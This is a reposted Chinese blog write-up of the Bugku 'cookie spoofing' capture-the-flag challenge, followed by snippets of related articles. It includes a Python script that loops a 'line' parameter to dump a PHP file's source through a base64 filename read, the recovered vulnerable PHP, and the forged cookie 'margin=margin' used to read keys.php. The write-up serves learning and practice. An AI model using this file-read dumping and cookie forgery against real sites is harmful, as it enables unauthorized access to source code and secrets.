cookie欺骗

最新推荐文章于 2022-10-21 18:54:38 发布
最新推荐文章于 2022-10-21 18:54:38 发布
阅读量189 收藏
点赞数
文章标签: php python
原文链接:http://www.cnblogs.com/nul1/p/8668064.html
版权

感觉这题还是比较接近实战,虽然比较简单。但是还是实战的一部分。

有些时候登录到某个界面的时候就需要验证cookie且需要判断你是否进入了这个界面,那么也就是说当filename等于admin.php且cookie又等于某个值的时候,这题当中是cookie:margin=margin

http://120.24.86.145:8002/web11/index.php?line=&filename=a2V5cy50eHQ=

一看就知道是文件读取的,然后解密了一下a2V5cy50eHQ=是keys.txt。最后然后改为index.php发现只出现<?php

后来经过测试line参数控制输出的行数

写了一个小脚本跑源码:

#!/usr/bin/env python 
#encoding:utf-8
#by i3ekr

import requests

for i in xrange(0,150):
    url = "http://120.24.86.145:8002/web11/index.php?line=%s&filename=aW5kZXgucGhw"%(i)
    html = requests.get(url).text
    print html

get源码如下,本来有很多空格我给删了。

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){#设置了cookie,且cookie等于margin
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){#判断$file的内容是否在$file_list当中,也就是filename参数要等于keys.php
$fa = file($file);#与 file_get_contents() 类似,不同的是 file() 将文件作为一个数组返回。
echo $fa[$line];#输出$fa[$line],$line是你输入的行数。也就是说按照行数然后将keys.php的代码以数组的形式呈现。
}
var_dump($file_list[2]);
?>

最终get答案为

index.php?line=1&filename=a2V5cy5waHA=

且需要将cookie设置为margin=margin

可以再用刚开始那个脚本再将line遍历一边keys.php即可getflag

转载于:https://www.cnblogs.com/nul1/p/8668064.html

???111
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
老兵cookie欺骗.rar
06-14
在IT安全领域,尤其是Web应用安全方面,"老兵cookie欺骗.rar"这个压缩包文件似乎包含了一个工具,专门用于DVWA(Damn Vulnerable Web Application)实验平台。DVWA是一个开源的安全学习平台,它模拟了各种常见的Web...
桂林老兵cookie欺骗工具
10-11
桂林老兵Cookie欺骗工具是一款在IT安全领域被广泛讨论的工具,主要用于网络安全研究和测试。这个工具因其在Cookie管理及欺骗技术方面的应用而知名,尤其对于理解Web安全和防御策略的专家来说,它是一个重要的学习...
cookie欺骗初探
pairsfish的专栏(你知道东方在哪一边)
06-29 1557
先普及一下基础知识 cookie欺骗      :就是利用cookie欺骗,攻击过程对于cookie的利用在于,cookie注入和cookie欺骗。 其它方法          :其他比较常用的还有xss,sql注入,旁注,什么的,这些先不提,多说一下这个跨站攻击其实叫做css,cross-site啥的,不过css这个简称已经被占用了,所以只能叫做xss了。         cookie
cookie欺骗教程
龙的天空
12-04 1199
   唉,很早就想点关于COOKIE的东东了,主要是网上有不少文章说半天其实也没有多少实质的东西。   首先大家明白什么是COOKIE,具体点说如果是98那么它们默认存放在C:/windows/cookies目录下,如果是2k它们在C:/Documents and Settings/%你的用户名%/Cookies目录下(每个文件都不会超过4KB)   它们的文件名格式为:你的用户名@产
cookie欺骗(bugku)
weixin_46396711的博客
04-28 1225
解题思路: 打开链接,发现是一串无意义的字符串 观察url,发现filename的值为base64编码格式,解码为keys.txt,line应该表示行,基于此,可通过改变line的值并将filename值改为index.php(记得转为base64格式),查看该文件的代码。 当line=1时 当line=2时 可通过python脚本将该文件内容打印出来 import requests a=25 #表示index.php文件的代码行数 for i in range(a): url="http:/
未授权登录COOKIE的伪造登录
WEB渗透测试 从入门到萌新
10-21 907
1、 通过分析代码 可以看到它的cookie认证是user== 不为空即可。2、直接输入登录进去的画面,我们使用抓包修改cookie看一下。抓这个要登录才能进去的页面 将cookie修改。xhcms熊海CMS。
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
桂林老兵cookie欺骗
07-02
【桂林老兵cookie欺骗】是一种网络安全测试技术,主要针对网站的cookie管理机制进行模拟攻击测试,以评估网站的安全性。在互联网应用cookie是服务器发送到用户浏览器并存储的一小块数据,用于维持用户会话状态、...
Cookie 欺骗——漏洞
战神/calmness的博客
09-30 1506
目录 描述 影响 过程 修复建议 通达OA2016网络智能办公系统 描述 通达OA作为国协同办公(OA)软件普及型的旗舰产品,功能涵盖人圆通讯、行政办公、知识管理、工作流程管理、HR、CRM、BI、ERP等8大领域,共有工作流、电子邮件、任务管理、日程安排、工作日志、公告通知、新闻、车辆管理、会议管理、办公用品管理、公文档案管理、项目管理、文件柜管理等300多个功能组件。在移动办公领域与钉钉形成全面战略合作,助您打造高效的沟通和管理平台 影响 V11版,2017版,2...
bugku之cookies欺骗
Seaern的博客
08-02 618
题目链接 打开页面一长串的字母··············无用 源码······································无用 观察url http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ= 参数filename的值是a2V5cy50eHQ=是base64编码,解密后得到ke...
bugkuctf cookie欺骗
舞动的獾
07-11 755
bugkuctf cookie 欺骗 打开页面后是一堆的乱码,我们可以从f12看到它的url包含了line=&filename=a2V5cy50eHQ= 在线解密base64,发现了文件名是keys.txt 我们可以试着改变文件名称将它的index.php给复现出来。 例如: 由于index.php的行数,我们可以用request库 的脚本将它还原出来,得到index.php的源码 ...
通过COOKIE欺骗登录网站后台
weixin_30908941的博客
03-09 1537
1.今天闲着没事看了看关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)的知识,xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击,通过插入恶意脚本,实现对用户游览器的控制,CSRF全名是Cross-site request forgery,是一种对网站的恶意利...
BugkuCTF:cookies欺骗(web)
s0il的博客
04-03 2587
题目描述: 点开链接,给了一串字符,这里只是一部分: rfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaiheg Burp抓包,发现没什么效果: 思路 但,包里面的 GET /web11/ind...
Bugku——cookie欺骗
csu_vc的博客
10-28 8364
看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来#!/usr/bin/env python # -*- coding: utf-8 -*- # @Date : 2017-10-28 09:36:41 # @Author : csu_vc # @Link : http://blog.c
Bugku-CTF (web 持续更新) ——新手ctf记录
xy7850的博客
09-22 2304
目录 1、滑稽 2、计算器 3、GET 4、POST GET和POST的区别: 5、矛盾 6、alert 7、你必须让他停下 1、滑稽 进入场景,发现一堆滑稽表情在飞 直接F12 2、计算器 进入场景,一道数学题,但是只能输入一个数字 F12,可以看到输入框的标签的maxlenth=1 改成2,就可以输入两个数字了,验证就得到了flag 3、GET 进入场景看到php源码,以get请求传入what=flag get,通过拼接url进行传递参
Cookie欺骗的原理
eldn__的专栏
11-20 8365
Cookie欺骗的原理 当访问asp.net网站时(这里用的是chrome), 如下图所示: 然后点击“审查元素”菜单时,如下所示: 再查看"Resources"下的Cookie,你会发现,存在一个叫ASP.NET_SessionId的Cookie变量,如下所示: Session, 通常服务端使用方式Session["uid"]获取到的值就是你的用户名。A与B访问该
什么是cookie欺骗
最新发布
05-20
Cookie欺骗是一种网络攻击,攻击者通过伪造或篡改网站的Cookie欺骗用户和服务器,从而获取非法的访问权限。Cookie是一种网站用于存储用户信息的小文件,其包含了用户的身份验证信息、会话信息等。攻击者可以通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值